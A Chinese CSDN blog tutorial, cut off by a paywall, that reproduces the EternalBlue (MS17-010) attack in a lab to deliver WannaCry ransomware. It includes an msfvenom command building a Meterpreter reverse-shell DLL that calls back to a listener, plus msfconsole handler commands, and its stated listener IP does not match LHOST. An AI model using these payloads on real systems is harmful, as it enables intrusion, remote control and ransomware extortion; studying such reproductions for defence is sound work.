永恒之蓝(勒索病毒)复现与利用

最新推荐文章于 2024-08-22 22:18:32 发布
置顶 最新推荐文章于 2024-08-22 22:18:32 发布
阅读量3.2k 收藏 9
点赞数 3
分类专栏: 工具使用 文章标签: 永恒之蓝 勒索病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38348692/article/details/98884212
版权
本文详细介绍了永恒之蓝勒索病毒的复现过程,包括所需环境、工具及攻击环节。通过在Windows Server 2003上运行利用脚本对开启445端口的Windows 2007发起攻击,利用Meterpreter回连到Kali系统,最终成功获取目标系统的shell并可进行勒索操作。
摘要由CSDN通过智能技术生成

整个的复现的过程需要的环境以及工具有:

  1. kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174

  2. winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141

  3. win2007 :靶机,确保445端口开启。ip:192.168.15.144

  4. 永恒之蓝利用脚本shadowbroker-master以及勒索病毒wcry.exe,脚本shadowbroker-master的文件夹放在server2003 C盘根目录下,勒索病毒在kali的根目录下。
    在这里插入图片描述

  5. python2.6已经在winsever下装python需要的环境pywin32-221.win32.在sever2003中分别安装这些文件,并配置python环境变量,确保python能够正常运行
    在这里插入图片描述
    攻击环节:
    1.在2003中修改C:\shadowbroker-master\windows下的Fuzzbunch.xml文件,修改内容如下,在这里要找到对应文件中的Resources文件的位置,然后对这个xml文件进行修改。在c:\的根目录下创建logs文件。
    在这里插入图片描述
    2.在kali上创建回链文件s.dll 命令如下:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.128 LPORT=4444 -f dll > s.dll
    在这里插入图片描述
    在生成文件后,把s.dll文件放到2003的根目录下,其中lhost中的ip地址为kali的ip 端口是随机的未占用端口。

3.在kali上运行,msfconsole,进行监听,命令如
msfconsole
use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

最低0.47元/天 解锁文章
KingCarzy
关注
专栏目录
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒复现及分析,希望这篇基础性文章对您有所帮助。
MS17-010永恒之蓝复现利用
kriesa的博客
07-13 779
MS17-010永恒之蓝复现利用
永恒之蓝 利用复现
nszmsjhshs的博客
03-11 6582
永恒之蓝早在2017年4月15日黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”是利用Windows系统的SMB(445)漏洞可以跳过密码直接获取系统最高权限。这还没让我们对它得到重视,然而随后发生的一件事让它就此名声大噪或者说臭名昭著,那就是用它加以改造的wannacry 勒索病毒。它刚一出现就引起波然大动,全球各国都有地方受到攻击。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
dzqxwzoe的博客
08-22 1068
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
勒索病毒(永恒之蓝)
读书 买花 长大
12-26 2263
Wannacry-永恒之蓝
永恒之蓝复现利用
m0_66890717的博客
04-14 1553
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。2、漏洞原理:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
MS17-010永恒之蓝漏洞的简谈与利用
qq_39120795的博客
11-12 4243
MS17-010是一个安全类型的补丁。 MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 于4月14号发出安全公告《Microsoft 安全公告 MS17-010 - 严重》 以下软件版本都受到影响。未列出的版本表明其支持生命周期已结束或不受影响。若要确定软件版本的支持生命周期,请参阅Microsoft 支持生命周期。 对每个受影响软件
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
sinat_27757177的博客
10-17 5137
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
永恒之蓝漏洞复现
qq_61024461的博客
07-17 221
永恒之蓝漏洞复现
批量扫描永恒之蓝-勒索病毒工具
09-30
批量扫描永恒之蓝-勒索病毒工具,可内网,可外网。支持IP、IP段、从文件读取IP列表扫描。 MS_17_010_Scan.exe -ip 10.19.77.69 MS_17_010_Scan.exe -ip 10.19.77.1 10.19.77.254 MS_17_010_Scan.exe -file ip.txt
永恒之蓝 (EternalBlue) 漏洞利用原理详解
volta_xu的博客
06-02 1250
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
MSF永恒之蓝漏洞利用详解[漏洞验证利用及后渗透]【详细版】
h1008685的博客
04-05 1213
MSF永恒之蓝漏洞利用详解[查找脚本,漏洞验证,漏洞利用,获取用户凭证,屏幕监控,进程迁移,键盘记录,防火墙配置指定端口,禁用UAC,使用nc(瑞士军刀)工具设置持久性后门,配置计划任务]
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
勒索病毒WannaCry(永恒之蓝
weixin_38920945的博客
05-21 859
原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处、作者信息和本声明。否则将追究法律责任。http://solin.blog.51cto.com/11319413/1925890勒索病毒WannaCry(永恒之蓝) 日前,"永恒之蓝"席卷全球,已经有90个国家遭到***。国内教育网是遭到***的重灾区。不过,在安装相对老旧版本Windows的电脑普遍遭到***...
关于勒索病毒永恒之蓝”的解决方案
10年职场两茫茫,35岁凄凉奈若何
09-12 799
关于勒索病毒永恒之蓝”的解决方案
ms17-010永恒之蓝漏洞利用,渗透同一局域网下的windows7
m0_63533079的博客
03-08 1940
利用window7存在的ms17-010漏洞进行复现演示
永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
沙罗沙罗的博客
05-09 4210
永恒之蓝漏洞利用(MS17-101) 文章目录永恒之蓝漏洞利用(MS17-101)一、永恒之蓝(MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(MS17-101)介绍 漏洞名称:“永恒之蓝”漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
渗透测试基础与永恒之蓝复现
永恒之蓝案例中,由于其利用的是系统级别的漏洞,攻击者可以迅速传播恶意软件,例如著名的WannaCry勒索病毒。因此,对于此类漏洞,及时打补丁和加强网络安全防护至关重要。 渗透测试是确保系统安全的重要手段,而...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值